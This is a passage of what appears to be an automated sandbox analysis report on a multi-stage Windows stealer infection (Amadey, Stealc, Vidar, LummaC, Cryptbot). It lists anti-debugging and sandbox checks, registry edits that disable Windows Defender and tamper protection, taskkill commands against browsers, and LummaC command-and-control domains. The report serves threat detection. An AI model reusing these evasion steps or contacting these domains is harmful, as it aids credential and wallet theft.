                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=
                      Source: file.exe, 00000000.00000002.2588649124.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp, DocumentsKJEGCFBGDH.exe, 00000015.00000002.2653120074.0000000000B8D000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000017.00000002.2743970653.000000000065D000.00000040.00000001.01000000.0000000E.sdmp, 241fdb96f6.exe, 0000001A.00000002.2939102064.000000000120C000.00000040.00000001.01000000.00000011.sdmp, fb696bafb5.exe, 00000028.00000002.3148239056.000000000071E000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeThread information set: HideFromDebugger
                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeFile opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeFile opened: SIWVID
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeSystem information queried: KernelDebuggerInformation
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeProcess queried: DebugPort
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeProcess queried: DebugPort
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeProcess queried: DebugPort
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeCode function: 21_2_053D0B67 rdtsc 21_2_053D0B67
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6C9C5FF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C963480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C963480
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C99B66C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C99B1F7
                      Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 241fdb96f6.exe PID: 8452, type: MEMORYSTR
                      Detected PureCrypter Trojan
                      Source: 8eeb449c35.exe, 00000019.00000003.2897070223.000000000530B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"ConfigIDs":"{\"ECS\":\"P-R-1082570-1-11,P-D-42388-2-6\",\"Edge\":\"P-X-1253166-4-5,P-X-1126445-2-5,P-X-1159506-2-5,P-X-1137521-3-11,P-X-1116674-11-34,P-X-1095018-2-6,P-X-1096650-2-6,P-X-1077147-1-9,P-X-1069756-2-8,P-X-1071593-2-4,P-X-1061902-3-17,P-X-1048071-1-5,P-X-1010579-1-9,P-X-1008556-23-102,P-X-1036081-1-3,P-X-1012411-2-9,P-X-97954-9-100,P-R-1068861-4-11,P-R-1008497-12-13,P-R-87486-2-17,P-R-67067-6-64,eej45377:646690,41612551:479862,cfg5e884:560003,eggf0128:472101,sendtabqr:498558,edauth0529:481519,9ffeg962:402950,ed0317:378541,producttrackingalertsettings_v1cf:458226,2chfa640:363442,edpas404:384675,hjd07315:315108,edenh823:312573,i8id9958:449025,v1_onlineselextraction:330872,edklo447:358232,linkui:481501\",\"EdgeConfig\":\"P-R-1457891-1-5,P-R-1279375-1-7,P-R-1221542-1-5,P-R-1176033-4-5,P-R-1174322-1-4,P-R-1129815-1-5,P-R-1148262-1-5,P-R-1147287-1-6,P-R-1136203-1-4,P-R-1133477-1-4,P-R-1130507-1-6,P-R-1113531-4-9,P-R-1099640-1-4,P-R-1098501-1-7,P-R-1090419-1-5,P-R-1082109-1-6,P-R-1082170-11-26,P-R-1052391-1-8,P-R-1039913-1-22,P-R-1036635-2-5,P-R-110491-24-85,P-R-68474-9-12,P-R-61206-14-20,P-R-61153-10-15,P-R-60617-7-21,P-R-45373-8-85,P-R-46265-41-108,P-D-1150672-1-4\",\"EdgeDomainActions\":\"P-R-1093245-1-19,P-R-1037936-1-14,P-R-1024693-1-11,P-R-108604-1-36,P-R-78306-1-18,P-R-73626-1-17,P-R-71025-5-13,P-R-63165-4-26,P-R-53243-2-7,P-R-40093-3-26,P-R-38744-7-97,P-R-31899-21-485,P-D-1138318-1-3,P-D-98331-6-32\",\"EdgeFirstRunConfig\":\"P-R-1075865-1-7\",\"Segmentation\":\"P-R-1473016-1-8,P-R-1159985-1-5,P-R-1113915-25-11,P-R-1098334-1-6,P-R-66078-1-3,P-R-66077-1-5,P-R-60882-1-2,P-R-43082-3-5,P-R-42744-1-2\"}","Edge":{"AccountLevelSyncReclaim":{"enableFeatures":["msAccountLevelSyncConsent","msNurturingAccountLevelSyncConsentSyncOff","msNurturingAccountLevelSyncConsentSyncOn"]},"AdsPlatformXEdgeexp":{"enableFeatures":["msEdgeAdPlatformUI","msEdgeAdPlatformBingPathsV3","msEdgeAdPlatformProtobufMigration","msEdgeAdPlatformUseIdentity"]},"ArrestUserChurn":{"enableFeatures":["msLoadChromeWebstoreByDefault"]},"DefaultBrowserBannerExternalStableRollout":{"enableFeatures":["msNurturingDefaultBrowserBannerCloseBtn","msNurturingUrlParser","msEdgeNurFIrisSupport"],"parameters":[{"name":"DismissalCap","value":"1000"}]},"DisablePageActionIcons":{"enableFeatures":["msOmniboxDisablePageActionIcons"],"parameters":[{"name":"msDisableOmniboxTriggeredIcon","value":"12,16"}]},"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"EdgeOnRampShowVersionWhatsNew":{"enableFeatures":["msEdgeOnRampShowWhatsNew"],"parameters":[{"name":"Browser Version","value":"131.0.0.0"}]},"EdgeShoppingOnlineSelectorExtraction":{"enableFeatures":["msShoppingExp1"]},"EdgeVpnAllSites":{"enableFeatures":["msEnableVpnAllSites"]},"EnhancedTextContrast":{"enableFeatures":["msEnhancedTextContrast"]},"ExternalStoreZeroSearchResults":{"enableFeatures":["msEnableZeroSearchResults"]},"PasswordZeroStateV2":{"enableFeatures
                      LummaC encrypted strings found
                      Source: 8eeb449c35.exe, 00000019.00000003.2832270546.0000000004960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
                      Source: 8eeb449c35.exe, 00000019.00000003.2832270546.0000000004960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
                      Source: 8eeb449c35.exe, 00000019.00000003.2832270546.0000000004960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
                      Source: 8eeb449c35.exe, 00000019.00000003.2832270546.0000000004960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
                      Source: 8eeb449c35.exe, 00000019.00000003.2832270546.0000000004960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
                      Maps a DLL or memory area into another process
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKJEGCFBGDH.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsKJEGCFBGDH.exe "C:\Users\user\DocumentsKJEGCFBGDH.exe"
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe "C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe "C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe "C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe "C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe "C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: 846d486827.exe, 0000001C.00000000.2921166068.00000000002A2000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: fb696bafb5.exe, 00000028.00000002.3152318272.000000000075F000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: LProgram Manager
                      Source: file.exe, file.exe, 00000000.00000002.2588649124.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: /BuProgram Manager
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99B341 cpuid 0_2_6C99B341
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9635A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6C9635A0
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Disable Windows Defender notifications (registry)
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                      Disable Windows Defender real time protection (registry)
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                      Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                      Disables Windows Defender Tamper protection
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeRegistry value created: TamperProtection 0
                      Modifies windows update settings
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                      Source: 8eeb449c35.exe, 8eeb449c35.exe, 00000019.00000003.2945314610.000000000530D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Amadeys stealer DLL
                      Source: Yara matchFile source: 23.2.skotes.exe.460000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.DocumentsKJEGCFBGDH.exe.990000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.2653034486.0000000000991000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2667219180.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.2703429539.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000003.2612784932.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2743822053.0000000000461000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Yara detected Credential Flusher
                      Source: Yara matchFile source: 0000001C.00000003.2922185232.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 846d486827.exe PID: 7752, type: MEMORYSTR
                      Yara detected Cryptbot
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: Process Memory Space: 8eeb449c35.exe PID: 9052, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 8eeb449c35.exe PID: 5932, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Yara detected Stealc
                      Source: Yara matchFile source: 0000001A.00000003.2894414344.0000000005820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2589542776.000000000180E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2940433964.0000000001A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.3202658017.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.3205756380.0000000000E41000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2588317062.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.3063493527.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2220319190.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2938763299.0000000000E41000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 241fdb96f6.exe PID: 8452, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 00000000.00000002.2589542776.000000000180E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
